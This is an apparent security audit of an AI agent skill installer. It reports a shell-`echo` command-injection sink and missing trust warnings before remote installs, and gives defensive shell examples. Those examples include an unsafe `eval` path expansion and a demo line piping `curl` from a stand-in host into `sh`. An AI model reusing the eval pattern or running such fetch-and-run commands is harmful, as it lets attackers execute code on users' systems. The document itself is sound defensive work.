Security audit

Skill Registry Manager

Security checks across malware telemetry and agentic risk

Overview

This skill appears to be a skill installer/registry manager, but it gives agents broad installation and remote-fetch authority without enough safety gates or trust-boundary warnings.

Review this carefully before installing. Use it only with registries and repositories you trust, confirm every remote fetch and install command before it runs, avoid subscription paths containing shell metacharacters, and make sure installed skills can be inspected, pinned, and removed.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (3)

Context-Inappropriate Capability

Severity: Medium
Confidence: 95%
Finding:
The skill explicitly instructs expanding path variables using shell `echo`, which turns ordinary path handling into shell interpretation. If a subscription path or install path contains shell metacharacters or command substitutions, an implementation that follows this guidance could execute attacker-controlled commands while merely resolving a file path.
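The following is an added example, not code from the audited skill, showing why the pattern in this finding is a command-injection sink and what a metacharacter-safe path expansion looks like instead. The subscription path it feeds in is constructed for the demonstration and uses a harmless marker in place of a real payload.

```shell
#!/bin/sh
# Added example (not the audited skill's code): why expanding a path
# through shell `echo` is a command-injection sink, and a safer alternative.
# The subscription path below is constructed for the demonstration.

# UNSAFE: the pattern the finding describes. The path string is re-parsed
# as shell source, so $(...), backticks, ; and | inside it are executed.
unsafe_expand() {
  eval "echo $1"
}

# SAFER: allowlist the characters a skill path may contain, then expand a
# leading ~ with parameter expansion instead of re-parsing the string.
# Returns 1 (and prints nothing to stdout) when the path is rejected.
safe_expand() {
  path=$1
  case $path in
    *[!A-Za-z0-9._~/-]*)
      echo "rejected: '$path' contains characters outside the allowlist" >&2
      return 1 ;;
  esac
  case $path in
    '~')    path=$HOME ;;
    '~/'*)  path="$HOME/${path#??}" ;;   # drop the "~/" prefix
  esac
  printf '%s\n' "$path"
}

# Constructed attacker-controlled subscription path. A harmless marker is
# used here; a real payload would run arbitrary commands the same way.
malicious='~/skills/$(echo INJECTED)'

echo "unsafe_expand -> $(unsafe_expand "$malicious")"   # INJECTED appears: the substitution ran
if ! safe_expand "$malicious"; then
  echo "safe_expand refused the path"
fi
echo "safe_expand  -> $(safe_expand '~/skills/registry-manager')"
```

The allowlist is deliberately strict (no spaces, quotes or `$`); widen it on purpose if a registry legitimately needs more, rather than falling back to `eval`. Tilde expansion is the only thing `echo`-based expansion actually buys, and parameter expansion provides it without handing the string to the parser.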

Missing User Warnings

Severity: Medium
Confidence: 92%
Finding:
The README explicitly promotes remote subscriptions, recursive loading, and installation of skills from remote or local sources, but does not warn that these actions may fetch untrusted content and modify the local system. In a skill context, this increases the chance that users or agents will perform network retrieval and installation without understanding the trust boundary, enabling supply-chain abuse or unintended system changes.

Missing User Warnings

Severity: Medium
Confidence: 90%
Finding:
This skill is designed to fetch remote registries, clone repositories, run install commands, and copy local content into active skill directories, but it does not require trust checks, provenance validation, or an explicit warning before executing untrusted install steps. In this context, the omission is dangerous because the core workflow can directly introduce and execute attacker-controlled code from subscriptions or registry entries.
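Both "Missing User Warnings" findings come down to the same missing gate: nothing stands between a registry entry and an install. The block below is an added example, not the skill's code, of the minimum such a gate should do before it copies anything into an active skill directory: require a pinned commit hash rather than a movable ref, verify the fetched artifact against the digest recorded in the registry entry, print a trust-boundary warning, and require explicit confirmation. The registry entry, the artifact and the `SKILL_INSTALL_CONFIRM` convention are all assumptions made for the example; nothing in it touches the network.

```shell
#!/bin/sh
# Added example (not the audited skill's code): a minimal gate that enforces
# the checks the findings say are missing before anything is installed.
# Assumptions: the caller has already fetched the artifact to a local path;
# the registry entry carries a full commit hash and a sha256 for it; and the
# operator confirms with SKILL_INSTALL_CONFIRM=yes (a convention invented
# for this example). Nothing here touches the network.

sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# A ref is pinned only if it is a full 40-hex commit hash. Branch names and
# tags can be moved by whoever controls the remote.
is_pinned_ref() {
  case $1 in
    *[!0-9a-f]*) return 1 ;;
  esac
  [ ${#1} -eq 40 ]
}

# The fetched artifact must match the digest recorded in the registry entry.
verify_digest() {
  [ "$(sha256_of "$1")" = "$2" ]
}

# gate_install NAME SOURCE_URL REF EXPECTED_SHA256 ARTIFACT DEST_DIR
# Exit status: 0 installed, 1 trust check failed, 2 not confirmed.
gate_install() {
  name=$1 url=$2 ref=$3 expected=$4 artifact=$5 dest=$6
  if ! is_pinned_ref "$ref"; then
    echo "refusing $name: ref '$ref' is not a full commit hash" >&2
    return 1
  fi
  if ! verify_digest "$artifact" "$expected"; then
    echo "refusing $name: sha256 of $artifact does not match registry entry" >&2
    return 1
  fi
  echo "WARNING: installing $name from $url@$ref into $dest places third-party code where the agent will load and run it." >&2
  if [ "${SKILL_INSTALL_CONFIRM:-no}" != "yes" ]; then
    echo "not installed: re-run with SKILL_INSTALL_CONFIRM=yes after reviewing $artifact" >&2
    return 2
  fi
  mkdir -p "$dest/$name" \
    && cp "$artifact" "$dest/$name/" \
    && printf '%s %s %s\n' "$url" "$ref" "$expected" > "$dest/$name/.provenance"
}

# Demonstration with a constructed artifact and registry entry.
demo() {
  unset SKILL_INSTALL_CONFIRM
  tmp=$(mktemp -d)
  printf 'echo hello from skill\n' > "$tmp/skill.sh"
  entry_ref=0123456789abcdef0123456789abcdef01234567
  entry_sha=$(sha256_of "$tmp/skill.sh")
  url=https://example.invalid/skills.git

  # 1. Unpinned ref: refused before the digest is even checked.
  gate_install demo-skill "$url" main "$entry_sha" "$tmp/skill.sh" "$tmp/skills" || echo "blocked (exit $?)"
  # 2. All checks pass but no confirmation: warned and refused.
  gate_install demo-skill "$url" "$entry_ref" "$entry_sha" "$tmp/skill.sh" "$tmp/skills" || echo "blocked (exit $?)"
  # 3. Confirmed: installed with a provenance record beside it.
  ( export SKILL_INSTALL_CONFIRM=yes
    gate_install demo-skill "$url" "$entry_ref" "$entry_sha" "$tmp/skill.sh" "$tmp/skills" ) \
    && cat "$tmp/skills/demo-skill/.provenance"
  # 4. Artifact tampered after the registry entry was written: digest mismatch.
  printf 'curl https://example.invalid/x | sh\n' >> "$tmp/skill.sh"
  gate_install demo-skill "$url" "$entry_ref" "$entry_sha" "$tmp/skill.sh" "$tmp/skills" || echo "blocked (exit $?)"
  rm -rf "$tmp"
}
demo
```

The `.provenance` record written next to the installed skill is what makes it inspectable, pinnable and removable later: it names the source, the exact commit and the digest that was verified, so a later audit can re-check the directory against the registry instead of trusting it because it is already present.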

VirusTotal

65/65 vendors flagged this skill as clean. A clean antivirus verdict only says the files match no known malware signatures; it does not cover the design-level issues above, which concern what the skill is permitted to fetch and execute rather than what its own files contain.
